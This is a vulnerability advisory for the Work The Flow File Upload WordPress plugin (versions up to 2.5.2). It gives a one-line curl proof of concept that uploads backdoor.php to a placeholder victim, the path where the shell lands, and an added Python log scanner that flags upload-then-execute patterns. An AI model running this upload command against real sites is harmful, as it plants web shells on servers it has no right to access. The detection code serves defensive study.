Work The Flow File Upload <= 2.5.2 - Shell Upload



Description
PoC:

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

Backdoor Location:

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php
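A log-based check for this issue, added here as an example that is not part of the WPVDB entry or of the plugin: it scans combined-format web server access logs for POSTs to the bundled jQuery-File-Upload handler and for direct fetches of PHP files from its files/ drop directory, and reports clients that did both in sequence. The log lines are constructed.

```python
import re
from collections import defaultdict

# Paths from the advisory: the bundled jQuery-File-Upload handler and its drop directory.
PLUGIN_PATH = (
    "/wp-content/plugins/work-the-flow-file-upload/public/assets/"
    "jQuery-File-Upload-9.5.0/server/php/"
)
UPLOAD_ENDPOINT = PLUGIN_PATH + "index.php"
DROP_DIR = PLUGIN_PATH + "files/"

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Apr/2015:10:01:02 +0000] "POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php HTTP/1.1" 200 87 "-" "curl/7.35.0"
203.0.113.5 - - [04/Apr/2015:10:01:05 +0000] "GET /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php HTTP/1.1" 200 41 "-" "curl/7.35.0"
198.51.100.7 - - [04/Apr/2015:10:02:00 +0000] "GET /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/photo.jpg HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return (kind, ip) for one log line; kind is 'upload', 'exec' or None."""
    m = LOG_RE.match(line)
    if not m:
        return None, None
    path = m.group("path").split("?", 1)[0]  # ignore any query string
    if m.group("method") == "POST" and path == UPLOAD_ENDPOINT:
        return "upload", m.group("ip")
    # Any server-side script fetched straight from the upload directory is suspicious.
    if path.startswith(DROP_DIR) and path.lower().endswith((".php", ".phtml", ".phar")):
        return "exec", m.group("ip")
    return None, m.group("ip")

def find_incidents(lines):
    """Map client IP -> 'upload', 'exec' or 'upload_then_exec' (POST to the handler, then a PHP fetch from files/)."""
    per_ip = defaultdict(list)
    for line in lines:
        kind, ip = classify(line)
        if kind:
            per_ip[ip].append(kind)
    report = {}
    for ip, kinds in per_ip.items():
        if "upload" in kinds and "exec" in kinds[kinds.index("upload"):]:
            report[ip] = "upload_then_exec"
        else:
            report[ip] = kinds[0]
    return report
```

Run it against a real log with `find_incidents(open(path))`; an `upload_then_exec` hit on an unpatched install is the pattern this advisory describes.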

Affects Plugin

Fixed in version 2.5.3
Plugin closed

References

ExploitDB 36640
Metasploit exploit/unix/webapp/wp_worktheflow_upload
PacketStorm 131294
PacketStorm 131512
URL http://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Claudio Viviani
Submitter Website http://www.homelab.it
Submitter Twitter homelabit
Views 7078
Verified Yes
WPVDB ID 7883

Timeline

Publicly Published 2015-04-04 (over 5 years ago)
Added 2015-04-04 (over 5 years ago)
Last Updated 2019-10-21 (9 months ago)
